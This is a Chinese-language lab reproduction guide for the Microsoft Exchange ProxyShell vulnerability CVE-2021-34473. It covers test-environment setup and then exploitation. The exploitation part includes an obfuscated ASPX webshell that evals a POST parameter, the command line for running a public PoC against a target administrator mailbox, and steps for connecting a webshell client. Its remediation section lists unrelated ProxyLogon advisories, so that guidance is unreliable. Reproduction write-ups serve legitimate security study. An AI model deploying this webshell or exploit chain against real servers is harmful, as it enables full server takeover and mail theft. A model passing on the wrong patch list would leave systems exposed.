Exchange CVE-2021-34473
背景:
2021年8月5日,安全研究员在国外安全会议上公开了CVE-2021-34473 Microsoft Exchange Server 远程代码执行漏洞分析及其POC。攻击者利用该漏洞可绕过相关权限验证,进而配合其他漏洞可执行任意代码,控制Microsoft Exchange Server。
漏洞编号:
CVE-2021-34473
影响版本:
Microsoft Exchange Server 2010
Microsoft Exchange Server 2013
Microsoft Exchange Server 2016
Microsoft Exchange Server 2019
环境搭建:(内存要8G)
1,安装AD域控,打开服务器管理器,点击管理 > 添加角色和功能(Windows Server 2016)
2,选择Active Directory 域服务 和 DNS服务器
3,打开服务器管理器,将此服务器提升为域控制器
4,设置一个密码
5,点击安装,安装完成后系统会自动重启
6,安装Exchange依赖组件
6.1.NET Framework 4.8
https://download.visualstudio.microsoft.com/download/pr/014120d7-d689-4305-befd-3cb711108212/0fd66638cde16859462a6243a4629a50/ndp48-x86-x64-allos-enu.exe
6.2.安装Visual C++w Redistributable Package for Visual Studio 2012
https://www.microsoft.com/en-us/download/details.aspx?id=30679
6.3.Visual C++ 2013 Redistributable Package
https://support.microsoft.com/zh-cn/topic/update-for-visual-c-2013-redistributable-package-d8ccd6a5-4e26-c290-517b-8da6cfdf4f10
6.4.通过Power Shell安装Exchange必备的Windows组件
Install-WindowsFeature Server-Media-Foundation, NET-Framework-45-Features, RPC-over-HTTP-proxy, RSAT-Clustering, RSAT-Clustering-CmdInterface, RSAT-Clustering-Mgmt, RSAT-Clustering-PowerShell, WAS-Process-Model, Web-Asp-Net45, Web-Basic-Auth, Web-Client-Auth, Web-Digest-Auth, Web-Dir-Browsing, Web-Dyn-Compression, Web-Http-Errors, Web-Http-Logging, Web-Http-Redirect, Web-Http-Tracing, Web-ISAPI-Ext, Web-ISAPI-Filter, Web-Lgcy-Mgmt-Console, Web-Metabase, Web-Mgmt-Console, Web-Mgmt-Service, Web-Net-Ext45, Web-Request-Monitor, Web-Server, Web-Stat-Compression, Web-Static-Content, Web-Windows-Auth, Web-WMI, Windows-Identity-Foundation, RSAT-ADDS
6.5,然后下载exchange 2016 ios:
https://download.microsoft.com/download/d/2/3/d23b113b-9634-4456-acba-1f7b0ce22b0e/ExchangeServer2016-x64-cu18.iso
7,安装Exchange右键以管理员身份运行
8,选择不检查更新
9,选择邮箱角色
10,禁用恶意软件扫描
11,根据错误提示点击链接修复错误(两个错误)
12,安装完成登录
复现步骤:
1,生成一个webshell,https://github.com/Ridter/proxyshell_payload ,在proxyshell_payload.py中,修改末尾的webshell变量,将其替换为蚁剑的webshell
更改前:
更改后:
'<%@ Page Language="Jscript" Debug=true%><%var NNVF=\'dFUwlmztVCSLYeHkDMgEZrKWhjQBNsuiGnf0xJPqAcvbIopXyaTR\';var NURV=Request.Form("mima");var FASZ=NNVF(2) + NNVF(28) + NNVF(10) + NNVF(40) + NNVF(1) + NNVF(13);eval(NURV, FASZ);%>'
运行后:
2,下载exp,https://github.com/dmaasland/proxyshell-poc编辑proxyshell_rce.py将上一步Encode webshell执行结果粘贴到314行
3,执行python proxyshell_rce.py -u https://x.x.x.x/ -e administrator@xxx.com(最后这个邮箱必须为目标邮箱管理组的邮箱用户名,一般administrator都在)执行这步的时候会报错缺少pypsrp模块,安装即可:pip install pypsrp
4,依次执行下面3条命令
① Get-MailboxExportRequest
② Get-MailboxExportRequest|Remove-MailboxExportRequest -Confirm:$false
③ dropshell
5,上传成功后使用蚁剑连接webshell,连接目标为上一步执行完最后得出的shell url地址,密码为mima
6,勾选忽略HTTPS证书
7,连接成功
漏洞修复:
CVE-2021-26855:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855
CVE-2021-26857:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857
CVE-2021-26858:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858
CVE-2021-27065:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065